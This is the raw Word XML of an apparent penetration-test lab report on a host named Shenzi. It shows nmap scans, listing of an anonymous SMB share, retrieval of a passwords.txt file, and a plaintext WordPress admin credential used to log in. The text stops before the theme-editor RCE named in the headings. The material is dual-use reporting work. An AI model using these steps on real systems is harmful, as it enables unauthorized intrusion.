            <w:bookmarkStart w:id="48" w:name="__RefHeading___Toc5463_4118114545"/>
            <w:bookmarkEnd w:id="48"/>
            <w:r>
              <w:rPr/>
              <w:t>Independent Challenges</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Heading2"/>
              <w:widowControl w:val="false"/>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
                <w:tab w:val="left" w:pos="0" w:leader="none"/>
              </w:tabs>
              <w:ind w:hanging="0" w:start="0"/>
              <w:rPr/>
            </w:pPr>
            <w:bookmarkStart w:id="49" w:name="__RefHeading___Toc5465_4118114545"/>
            <w:bookmarkStart w:id="50" w:name="_Toc151462878"/>
            <w:bookmarkStart w:id="51" w:name="_Toc92992244"/>
            <w:bookmarkEnd w:id="49"/>
            <w:r>
              <w:rPr/>
              <w:t>Target #1 – 1</w:t>
            </w:r>
            <w:bookmarkEnd w:id="51"/>
            <w:r>
              <w:rPr/>
              <w:t>92.168.232.55</w:t>
            </w:r>
            <w:bookmarkEnd w:id="50"/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Heading3"/>
              <w:widowControl w:val="false"/>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
                <w:tab w:val="left" w:pos="0" w:leader="none"/>
              </w:tabs>
              <w:spacing w:before="0" w:after="240"/>
              <w:ind w:hanging="0" w:start="0"/>
              <w:rPr/>
            </w:pPr>
            <w:bookmarkStart w:id="52" w:name="__RefHeading___Toc5498_4118114545"/>
            <w:bookmarkStart w:id="53" w:name="_Toc151462879"/>
            <w:bookmarkStart w:id="54" w:name="_Toc92992251_Copy_1"/>
            <w:bookmarkEnd w:id="52"/>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-ZA"/>
              </w:rPr>
              <w:t xml:space="preserve">Initial Access – </w:t>
            </w:r>
            <w:bookmarkEnd w:id="54"/>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-ZA"/>
              </w:rPr>
              <w:t>Anonymous SMB share leads to Wordpress RCE</w:t>
            </w:r>
            <w:bookmarkEnd w:id="53"/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="DefaultParagraphFont"/>
                <w:b/>
              </w:rPr>
              <w:t>Vulnerability Explanation:</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> The SMB server is not protected with the password and has some sensitive information like credentials store. Which leads to RCE from wordpress theme editor.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="DefaultParagraphFont"/>
                <w:b/>
              </w:rPr>
              <w:t>Vulnerability Fix:</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> The SMB should be configured with credentials and guest enumeration should be disabled.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="DefaultParagraphFont"/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Severity: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="DefaultParagraphFont"/>
                <w:b/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="DefaultParagraphFont"/>
                <w:b/>
              </w:rPr>
              <w:t>Steps to reproduce the attack:</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> Ran the initial service scan John discovered that this host is called Sehnzi. Smbclient was used to interact on the port 445 to get the passwords.txt file from SMB share shenzi and used those credentials for wordpress admin access.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Heading3"/>
              <w:widowControl w:val="false"/>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
                <w:tab w:val="left" w:pos="0" w:leader="none"/>
              </w:tabs>
              <w:ind w:hanging="0" w:start="0"/>
              <w:rPr/>
            </w:pPr>
            <w:bookmarkStart w:id="55" w:name="__RefHeading___Toc5469_4118114545"/>
            <w:bookmarkEnd w:id="55"/>
            <w:r>
              <w:rPr/>
              <w:t>S</w:t>
            </w:r>
            <w:bookmarkStart w:id="56" w:name="_Toc151462880"/>
            <w:bookmarkStart w:id="57" w:name="_Toc92992245"/>
            <w:r>
              <w:rPr/>
              <w:t>ervice Enumeration</w:t>
            </w:r>
            <w:bookmarkEnd w:id="56"/>
            <w:bookmarkEnd w:id="57"/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="240" w:before="240" w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Port Scan Results</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblW w:w="8861" w:type="dxa"/>
              <w:jc w:val="start"/>
              <w:tblInd w:w="0" w:type="dxa"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblCellMar>
                <w:top w:w="0" w:type="dxa"/>
                <w:start w:w="5" w:type="dxa"/>
                <w:bottom w:w="0" w:type="dxa"/>
                <w:end w:w="5" w:type="dxa"/>
              </w:tblCellMar>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="1719"/>
              <w:gridCol w:w="7141"/>
            </w:tblGrid>
            <w:tr>
              <w:trPr/>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1719" w:type="dxa"/>
                  <w:tcBorders>
                    <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                    <w:start w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                    <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                    <w:end w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                  </w:tcBorders>
                </w:tcPr>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyA"/>
                    <w:spacing w:lineRule="auto" w:line="360" w:before="0" w:after="200"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
                      <w:b/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
                      <w:b/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>IP Address</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="7141" w:type="dxa"/>
                  <w:tcBorders>
                    <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                    <w:start w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                    <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                    <w:end w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                  </w:tcBorders>
                </w:tcPr>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyA"/>
                    <w:spacing w:lineRule="auto" w:line="360" w:before="0" w:after="200"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
                      <w:b/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
                      <w:b/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Ports Open</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr>
              <w:trPr/>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1719" w:type="dxa"/>
                  <w:tcBorders>
                    <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                    <w:start w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                    <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                    <w:end w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                  </w:tcBorders>
                </w:tcPr>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyA"/>
                    <w:spacing w:lineRule="auto" w:line="360" w:before="0" w:after="200"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>192.168.232.55</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="7141" w:type="dxa"/>
                  <w:tcBorders>
                    <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                    <w:start w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                    <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                    <w:end w:val="single" w:sz="4" w:space="0" w:color="000000"/>
                  </w:tcBorders>
                </w:tcPr>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyA"/>
                    <w:spacing w:lineRule="auto" w:line="360" w:before="0" w:after="200"/>
                    <w:jc w:val="both"/>
                    <w:rPr/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rStyle w:val="DefaultParagraphFont"/>
                      <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
                      <w:b/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>TCP</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rStyle w:val="DefaultParagraphFont"/>
                      <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>: 21, 80, 135, 139, 443, 3306, 49666</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360" w:before="240" w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Calibri" w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans"/>
              </w:rPr>
              <w:t>We run nmap to scan the target and found a few ports open.</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nmap 192.168.232.55 -p- --min-rate 20000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Starting Nmap 7.93 ( https://nmap.org ) at 2023-11-17 10:28 +04</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Warning: 192.168.232.55 giving up on port because retransmission cap hit (10).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Nmap scan report for 192.168.232.55</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Host is up (0.27s latency).</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Not shown: 48865 filtered tcp ports (no-response), 16662 closed tcp ports (conn-refused)</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PORT      STATE SERVICE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21/tcp    open  ftp</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80/tcp    open  http</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135/tcp   open  msrpc</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139/tcp   open  netbios-ssn</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443/tcp   open  https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445/tcp   open  microsoft-ds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3306/tcp  open  mysql</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49665/tcp open  unknown</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8"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Nmap done: 1 IP address (1 host up) scanned in 173.20 seconds</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5613400" cy="2131695"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="2" name="Picture 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 title=""/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId3"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5613400" cy="2131695"/>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nmap -sCV 192.168.232.55</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5397500" cy="3543300"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="3" name="Image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 descr="" title=""/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId4"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5397500" cy="3543300"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Heading3"/>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
                <w:tab w:val="left" w:pos="0" w:leader="none"/>
              </w:tabs>
              <w:ind w:hanging="0" w:start="0"/>
              <w:rPr/>
            </w:pPr>
            <w:bookmarkStart w:id="58" w:name="__RefHeading___Toc5500_4118114545"/>
            <w:bookmarkEnd w:id="58"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="DefaultParagraphFont"/>
                <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Initial Access – SMB share to Wordpress RCE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans"/>
              </w:rPr>
              <w:t>SMB revlead a ‘Shenzi’ share which was not protected with password and has interesting files for us.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smbclient -L \\\\192.168.232.55</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5397500" cy="1231900"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="4" name="Image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 descr="" title=""/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId5"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5397500" cy="1231900"/>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smbclient \\\\192.168.232.55\\shenzi</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Password for [WORKGROUP\kali]:</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Try "help" to get a list of possible commands.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smb: \&gt; ls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                                   D        0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                                  D        0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passwords.txt                A     894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readme_en.txt               A   7367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sess_klk75u2q4rpgfjs3785h6hpipp      A     3879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why.tmp                        A      213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xampp-control.ini           A      178  Thu May 28 19:45:09 2020</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 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>12941823 blocks of size 4096. 5850488 blocks available</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5613400" cy="1831975"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="5" name="Image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4" descr="" title=""/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId6"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5613400" cy="1831975"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="DefaultParagraphFont"/>
                <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans"/>
              </w:rPr>
              <w:t>Shenzi share has passwords.txt file, we will download it which can be used for login in wordpress admin account.</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smb: \&gt; get passwords.txt</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5613400" cy="320040"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="6" name="Image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 descr="" title=""/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId7"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5613400" cy="320040"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:keepNext w:val="true"/>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cat passwords.txt</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5613400" cy="4608830"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="7" name="Image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6" descr="" title=""/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId8"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5613400" cy="4608830"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans"/>
                <w:color w:val="111111"/>
              </w:rPr>
              <w:t xml:space="preserve">From all the password </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">admin:FeltHeadwallWight357 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans"/>
                <w:color w:val="111111"/>
              </w:rPr>
              <w:t>looks interesting, We couldn’t find any interesting directory with our directory busting enumeration using common wordlists, however if use our Share name it revels a wordpress site.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>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http://192.168.232.55/shenzi/</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5613400" cy="1744345"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="8" name="Image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7" descr="" title=""/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId9"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5613400" cy="1744345"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="DefaultParagraphFont"/>
                <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
              </w:rPr>
              <w:t xml:space="preserve">We used initially discovered credentials </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">admin:FeltHeadwallWight357 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="DefaultParagraphFont"/>
                <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
              </w:rPr>
              <w:t xml:space="preserve"> from the SMB share to login into wordpress.</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http://192.168.232.55/shenzi/wp-login.php</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5613400" cy="2366645"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="9" name="Image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8" descr="" title=""/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId10"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
